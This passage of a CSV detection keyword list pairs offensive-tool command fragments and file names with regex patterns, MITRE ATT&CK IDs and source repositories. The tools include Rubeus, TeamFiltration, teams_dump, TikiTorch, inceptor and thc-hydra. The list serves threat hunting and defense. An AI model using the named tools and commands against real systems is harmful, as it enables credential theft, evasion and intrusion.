Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* TeamFiltration.dll*",".{0,1000}\sTeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* TeamFiltration.exe*",".{0,1000}\sTeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 
Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "* teamspeak2-version.nse*",".{0,1000}\steamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* teamstracker.py*",".{0,1000}\steamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "* telnet-brute.nse*",".{0,1000}\stelnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-encryption.nse*",".{0,1000}\stelnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-ntlm-info.nse*",".{0,1000}\stelnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* termux-chroot */cloudflared*",".{0,1000}\stermux\-chroot\s.{0,1000}\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "* Test different CLientID's against MSGraph to determine permissions*",".{0,1000}\sTest\sdifferent\sCLientID\'s\sagainst\sMSGraph\sto\sdetermine\spermissions.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* test_privesc.py*",".{0,1000}\stest_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* tftp-enum.nse*",".{0,1000}\stftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tgssub * /ticket:*",".{0,1000}\stgssub\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* tgtdeleg /nowrap*",".{0,1000}\stgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* tgtdeleg /spn:cifs*",".{0,1000}\stgtdeleg\s\/spn\:cifs.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* tgtdeleg /target:*",".{0,1000}\stgtdeleg\s\/target\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* thc-hidra*",".{0,1000}\sthc\-hidra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "* theHarvester.py *",".{0,1000}\stheHarvester\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* theHarvester.py*",".{0,1000}\stheHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Theif.dll*",".{0,1000}\sTheif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "* thief.py*",".{0,1000}\sthief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems 
searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "* --threads * scan --buckets-file* ",".{0,1000}\s\-\-threads\s.{0,1000}\sscan\s\-\-buckets\-file.{0,1000}\s","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "* ticket_converter.py*",".{0,1000}\sticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "* ticketConverter.py*",".{0,1000}\sticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* ticketsplease.*",".{0,1000}\sticketsplease\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* TikiLoader*",".{0,1000}\sTikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. 
writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "* tls-alpn.nse*",".{0,1000}\stls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tls-nextprotoneg.nse*",".{0,1000}\stls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tls-ticketbleed.nse*",".{0,1000}\stls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tmp_payload.txt*",".{0,1000}\stmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "* tn3270-screen.nse*",".{0,1000}\stn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* TokenStrip.c *",".{0,1000}\sTokenStrip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* TokenStripBOF.o *",".{0,1000}\sTokenStripBOF\.o\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* TokenUniverse.zip*",".{0,1000}\sTokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "* tokenvator *",".{0,1000}\stokenvator\s.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "* -Tokenvator -Command *",".{0,1000}\s\-Tokenvator\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --tor *",".{0,1000}\s\-\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* tor deb.torproject.org-keyring*",".{0,1000}\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "* tor:amd64 *",".{0,1000}\stor\:amd64\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* tor-consensus-checker.nse*",".{0,1000}\stor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --tor-port*",".{0,1000}\s\-\-tor\-port.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --tor-type*",".{0,1000}\s\-\-tor\-type.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* toteslegit.ps1*",".{0,1000}\stoteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* traceroute-geolocation.nse*",".{0,1000}\straceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --transformer donut*",".{0,1000}\s\-\-transformer\sdonut.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --transformer Loader*",".{0,1000}\s\-\-transformer\sLoader.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --transformer pe2sh*",".{0,1000}\s\-\-transformer\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --transformer sRDI*",".{0,1000}\s\-\-transformer\ssRDI.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* tricky.ps1*",".{0,1000}\stricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the 
.lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "* tricky.vbs*",".{0,1000}\stricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "* tricky2.ps1*",".{0,1000}\stricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "* --trusted-for-delegation *",".{0,1000}\s\-\-trusted\-for\-delegation\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* TSCHRPCAttack*",".{0,1000}\sTSCHRPCAttack.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* 
tso-brute.nse*",".{0,1000}\stso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tso-enum.nse*",".{0,1000}\stso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --tunnel-address 127.0.0.1:7171*",".{0,1000}\s\-\-tunnel\-address\s127\.0\.0\.1\:7171.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 